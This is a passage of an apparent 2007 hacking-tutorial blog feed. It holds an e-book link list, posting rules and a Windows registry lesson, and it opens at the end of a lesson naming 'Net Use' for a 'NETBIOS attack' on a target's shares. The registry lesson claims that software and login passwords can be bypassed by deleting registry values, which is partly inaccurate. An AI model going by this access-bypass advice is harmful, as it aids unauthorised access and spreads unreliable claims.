style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;The final command required now is &lt;b style=""&gt;Net Use&lt;/b&gt;. This command will connect you to the target computers shared resources i.e. my documents, temp folder, etc.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;span style="font-family:Arial;"&gt;This process is called the &lt;span style="font-weight: bold;"&gt;NETBIOS&lt;/span&gt; attack.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-3075998177687971290?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/3075998177687971290/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=3075998177687971290' title='12 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/3075998177687971290'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/3075998177687971290'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/basic-approach-attacking-remote.html' title='HACKING LESSON 12'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>12</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-4600376525991656935</id><published>2007-04-02T15:44:00.000+05:30</published><updated>2007-05-31T17:39:17.358+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='E Books'/><title type='text'>BOOKS SECTION</title><content type='html'>&lt;span style="font-weight: bold; color: rgb(51, 51, 51);"&gt;Current Uploads -&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="widget-content" style="font-weight: bold; color: rgb(51, 51, 51);"&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="color: rgb(153, 0, 0);"&gt;HACKING&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;a href="http://www.esnips.com/doc/c3cd458a-f71a-47bb-b2ef-f438b0e5bbe0/AHackersGuide"&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;1)-HACKER'S GUIDE&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;a href="http://www.esnips.com/doc/1ad93ecc-3b80-44a3-b8c4-14ae6c6b677d/Windows-XP-Hacks"&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;2)-WINDOWS XP HACKS&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;a href="http://www.esnips.com/doc/484db079-7348-4d6c-894e-5055efc8b2b4/Hacking---Firewalls-And-Networks"&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;3)-HACKING - FIREWALLS &amp; NETWORKS&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;a style="color: rgb(102, 102, 102);" href="http://www.esnips.com/doc/ea8dd38c-d800-437e-bee6-f282bb3f9def/100-Linux-Tips--Tricks"&gt;4)-100 LINUX TRIPS &amp; TRICKS&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a style="color: rgb(102, 102, 102);" href="http://www.esnips.com/doc/c1378f20-575f-443f-9660-369e8f794c4f/REGHELP"&gt;5)-HOW TO USE WINDOWS REGISTRY&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="http://www.esnips.com/web/blogshu-books"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="color: rgb(153, 0, 0);"&gt;LANGUAGE&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;a href="http://www.esnips.com/doc/f05d1a5d-3d2f-40a5-a1c3-4f5fe46e36ef/French"&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;1)-COMPLETE GUIDE TO LEARN FRENCH&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;a href="http://www.esnips.com/doc/b1198fdc-a58f-450c-b37e-ca40e1cffc40/German"&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;2)-LEARN GERMAN&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;a href="http://www.esnips.com/doc/215d5c37-ba1b-4f4d-ac2c-e44000ae6c28/Chinese_%28Mandarin%29_v0.2"&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;3)-LEARN CHINESE&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="color: rgb(153, 0, 0);"&gt;FINANCE&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;a style="color: rgb(102, 102, 102);" href="http://www.esnips.com/doc/2943e04c-df9c-4267-a1e0-4756dcaf39d0/Finance---Investment-Valuation"&gt;&lt;br /&gt;&lt;/a&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;a style="color: rgb(102, 102, 102);" href="http://www.esnips.com/doc/2943e04c-df9c-4267-a1e0-4756dcaf39d0/Finance---Investment-Valuation"&gt;1)-INVESTMENT VALUATION&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;br /&gt;&lt;span style="color: rgb(153, 0, 0);"&gt;NOVELS&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;a href="http://www.esnips.com/doc/c9dd0497-5746-4ca2-bea3-5e942614495c/knights_templars"&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;1)-THE KNIGHT TEMPLAR'S&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;a href="http://www.esnips.com/doc/52e1cd6f-075d-418d-8276-e896e7ce1450/the-hidden-gears-of-freemasonry"&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;2)-THE HIDDEN GEARS OF FREEMASONRY&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;br /&gt;&lt;a style="color: rgb(102, 102, 102);" href="http://www.esnips.com/doc/76824bae-b207-41c0-b92f-4c3af5947ff7/The-Lord-Of-The-Rings-Collection"&gt;3)-LORD OF THE RINGS - THE COMPLETE COLLECTION&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="color: rgb(153, 0, 0);"&gt;&lt;br /&gt;MISC&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;a style="color: rgb(102, 102, 102);" href="http://www.esnips.com/doc/ea8dd38c-d800-437e-bee6-f282bb3f9def/100-Linux-Tips--Tricks"&gt;&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;span&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;a href="http://www.esnips.com/doc/f489d9b1-e2f7-466f-8981-59fb77d4f202/%5Bbuddhism%5D-The-Art-of-Living"&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;1)-THE ART OF LIVING (BUDDHISM)&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;a href="http://www.esnips.com/doc/3a14c24d-89f5-47c8-a3cc-9dd259e5edee/Body-Language"&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;2)-BODY LANGUAGE&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;a href="http://www.esnips.com/doc/c9dd0497-5746-4ca2-bea3-5e942614495c/knights_templars"&gt;&lt;br /&gt;&lt;/a&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;a style="color: rgb(102, 102, 102);" href="http://www.esnips.com/doc/76824bae-b207-41c0-b92f-4c3af5947ff7/The-Lord-Of-The-Rings-Collection"&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-4600376525991656935?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/4600376525991656935/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=4600376525991656935' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/4600376525991656935'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/4600376525991656935'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/books_01.html' title='BOOKS SECTION'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-8010756274591917503</id><published>2007-04-01T23:10:00.000+05:30</published><updated>2007-05-07T14:58:48.789+05:30</updated><title type='text'>PROCEDURE TO START</title><content type='html'>&lt;div style="text-align: justify;"&gt;In order to post, first of all every user need to register....for which he/she should send a mail to the following id &lt;span style="color: rgb(51, 102, 255); font-weight: bold;"&gt;hackinme@gmail.com&lt;/span&gt;&lt;span style="color: rgb(51, 51, 51);"&gt; or leave your email id in the comments field of this post. Once your email is added then you can easily access the blog....post your queries and receive the answers accordingly.&lt;br /&gt;&lt;br /&gt;What can you learn here-------&lt;br /&gt;&lt;br /&gt;1). How to make use of search engines in most effective way?&lt;br /&gt;2). What is the use of different types of softwares?&lt;br /&gt;3). From what sources you can get these softwares?&lt;br /&gt;4). Using Windows registry, and all the other features of your system.....&lt;br /&gt;5). How to earn online?&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic; color: rgb(51, 51, 255);"&gt;6). PLUS A LOT MORE............&lt;br /&gt;&lt;br /&gt;Looking forward for a wonderful experience.........&lt;br /&gt;&lt;br /&gt;Regards&lt;br /&gt;$&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-8010756274591917503?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/8010756274591917503/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=8010756274591917503' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/8010756274591917503'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/8010756274591917503'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/procedure-to-start.html' title='PROCEDURE TO START'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-2699367138425997086</id><published>2007-04-01T22:57:00.000+05:30</published><updated>2007-04-03T13:49:24.144+05:30</updated><title type='text'>HACKING MADE EASY</title><content type='html'>Be aware that there are restrictions here for asking and posting about the following topics:&lt;br /&gt;&lt;br /&gt;1) Hacking yahoo, hotmail, orkut, gmail, MSN, etc.&lt;br /&gt;2) Links to porn or viruses.&lt;br /&gt;3) Hacking Credit card/bank account/paypal, etc.&lt;br /&gt;&lt;br /&gt;Regards&lt;br /&gt;&lt;span style="font-style: italic; color: rgb(51, 51, 255);"&gt;&lt;span style="font-weight: bold;"&gt;$&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-2699367138425997086?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/2699367138425997086/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=2699367138425997086' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/2699367138425997086'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/2699367138425997086'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/hacking-made-easy.html' title='HACKING MADE EASY'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-5240550681087088256</id><published>2007-04-01T21:25:00.000+05:30</published><updated>2007-05-06T21:55:02.372+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows Registry'/><title type='text'>WINDOWS REGISTRY (Lesson 3 &amp; 4)</title><content type='html'>&lt;h4&gt;&lt;span style="font-weight: normal;font-family:Arial;" &gt;The Windows Registry Editor is the tool that enables you to make changes to your system registry, which stores information about how the hardware and software on your computer runs. Generally, you will not and should not edit your system registry unless it is absolutely necessary. Most changes are made to the registry without your knowing they are happening. For example, installing a new application or adding a new printer to your system will update the registry. If there is an error in your registry, your computer may become unstable or nonfunctional. With a good backup, you can restore the registry to its state before any changes were made.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h4&gt;  &lt;h4&gt;&lt;span style="font-weight: normal;font-family:Arial;" &gt;To access the system registry, click Start &gt; Run, type Regedit and press the Enter key. This will open the Registry Editor. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h4&gt;  &lt;h4&gt;&lt;u&gt;&lt;span style="font-family:Arial;"&gt;Inside the Registry Editor – &lt;/span&gt;&lt;/u&gt;&lt;span style="font-weight: normal;font-family:Arial;" &gt;There are 5 Keys on the left side of the screen&lt;/span&gt;&lt;u&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/h4&gt;  &lt;h4&gt;&lt;span style="font-family:Arial;"&gt;Hkey_Classes_Root&lt;/span&gt;&lt;span style="font-weight: normal;font-family:Arial;" &gt; - This key displays information about OLE and associated mappings to support drag-and-drop operations.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h4&gt;  &lt;h4&gt;&lt;span style="font-family:Arial;"&gt;Hkey_Current_User&lt;/span&gt;&lt;span style="font-weight: normal;font-family:Arial;" &gt; - This points to a branch of Hkey_Users for the currently logged on user.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h4&gt;  &lt;h4&gt;&lt;span style="font-family:Arial;"&gt;Hkey_Local_Machine &lt;/span&gt;&lt;span style="font-weight: normal;font-family:Arial;" &gt;-&lt;/span&gt;&lt;span style="font-family:Arial;"&gt; &lt;/span&gt;&lt;span style="font-weight: normal;font-family:Arial;" &gt;This contains computer specific information including installed hardware and software. This is the one I tend to spend the most time in.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h4&gt;  &lt;h4&gt;&lt;span style="font-family:Arial;"&gt;Hkey_Users&lt;/span&gt;&lt;span style="font-weight: normal;font-family:Arial;" &gt; - This contains information about users that have logged on to the computer&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h4&gt;  &lt;h4&gt;&lt;span style="font-family:Arial;"&gt;Hkey_Current_Config - &lt;/span&gt;&lt;span style="font-weight: normal;font-family:Arial;" &gt;This key points to a branch of Hkey_Local_Machine \ Config and has information such as display fonts and printers.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h4&gt;  &lt;p class="MsoNormal"&gt;&lt;b&gt;&lt;span style="font-family:Arial;"&gt;TIPS&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt;- All these tricks listed below are for Windows 95 many of them work with XP also, but make sure of one thing….before &lt;b&gt;changing, deleting or creating&lt;/b&gt; any value…or to be on a safer side before &lt;b&gt;&lt;span style="color:red;"&gt;TOUCHING&lt;/span&gt;&lt;/b&gt; the registry make sure that you have taken a back up (Go to File &gt; Export for back up) of the registry. One wrong step can crash your system.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;h4&gt;&lt;span style=";font-family:Arial;color:red;"  &gt;CAUTION&lt;/span&gt;&lt;span style="font-weight: normal;font-family:Arial;" &gt;: The backup that will be created will be a .REG file and is executable. Therefore double-clicking it will replace your current registry with the registry contained in the .REG file. This can be extremely dangerous. Be certain this is what you really want to do.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h4&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;h3&gt;&lt;span style="font-size:12;"&gt;- Changing the Location of Special Folders&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h3&gt;  &lt;p&gt;&lt;span style="font-family:Arial;"&gt;You can modify the registry to change the location of special folders like:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-family:Arial;"&gt;My Documents&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-family:Arial;"&gt;Favorites&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-family:Arial;"&gt;My Pictures&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-family:Arial;"&gt;Personal&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;  &lt;ol start="1" type="1"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-family:Arial;"&gt;Start Regedit&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-family:Arial;"&gt;Go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User      Shell Folders&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-family:Arial;"&gt;Double click on any locations you want to change and alter the path&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-family:Arial;"&gt;Logoff or restart for the changes to go into effect&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;  &lt;h3&gt;&lt;span style="font-size:12;"&gt;Eliminating the Right Click on the Taskbar&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h3&gt;  &lt;p&gt;&lt;span style="font-family:Arial;"&gt;To eliminate the right click on the taskbar:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;ol start="1" type="1"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-family:Arial;"&gt;Start Regedit&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-family:Arial;"&gt;Go to HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \      CurrentVersion \ Policies \ Explorer&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-family:Arial;"&gt;Add a DWORD and give it a name of &lt;i&gt;NoTrayContextMenu&lt;/i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-family:Arial;"&gt;Give it a value of 1&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-family:Arial;"&gt;Reboot &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;  &lt;h3&gt;&lt;span style="font-size:12;"&gt;Eliminating the Right Click on the Desktop&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h3&gt;  &lt;p&gt;&lt;span style="font-family:Arial;"&gt;To eliminate the right click on the desktop:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;ol start="1" type="1"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-family:Arial;"&gt;Start Regedit&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-family:Arial;"&gt;Go to HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \      CurrentVersion \ Policies \ Explorer&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-family:Arial;"&gt;Add a DWORD and give it a name of &lt;i&gt;NoViewContextMenu&lt;/i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-family:Arial;"&gt;Give it a value of 1&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-family:Arial;"&gt;Reboot &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;  &lt;p class="MsoNormal" style=""&gt;&lt;span style="font-family:Arial;"&gt;These are only three tricks…..there are many more available on net…..the idea here is not to teach you how to disable right click or how to change the color, fonts, looks, etc…..The basic reason why we post this chapter is to teach that if registry is the place where all the information is stored then &lt;b style=""&gt;why cant we brake passwords from here&lt;/b&gt;???&lt;/span&gt;&lt;/p&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;b style=""&gt;&lt;u&gt;E.g&lt;/u&gt;&lt;/b&gt;. I install a software on my system to guard some folders which contain material which I want to hide. In order to access the folder I have to input a password, and if it is right only then I can see the content of the folder.     &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt;&lt;/o:p&gt;From this example it is clear that the password is stored somewhere in the system from where the software compares the value which I enter in the password field.&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt;&lt;/o:p&gt;For this example as well as for every other software which asks for password to access the system features including the windows login password, all these values are stored in windows registry. Whenever the user enters a password, it is compared with the value stored in the system registry, and if it is found correct only then the user is allowed to access the feature.&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt;&lt;/o:p&gt;In Windows registry we can search for specific items, keys, values or software’s using the search function in edit menu. But there is one problem the password is not stored in its original form, it is converted to some other format so that no one can recognize it. E.g.; If I set the password as “hacking” it is stored as “6167453291” or may be some other form depending upon the software.&lt;/p&gt;      &lt;p class="MsoNormal" style=""&gt;&lt;o:p&gt;&lt;/o:p&gt;In such cases what we can do is reset the password i.e. delete the value (whatever it is). Once the value is deleted there is no password and our purpose is solved.&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;b style=""&gt;&lt;span style=";font-family:Arial;color:red;"  &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-5240550681087088256?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/5240550681087088256/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=5240550681087088256' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/5240550681087088256'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/5240550681087088256'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/windows-registry.html' title='WINDOWS REGISTRY (Lesson 3 &amp; 4)'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry></feed>
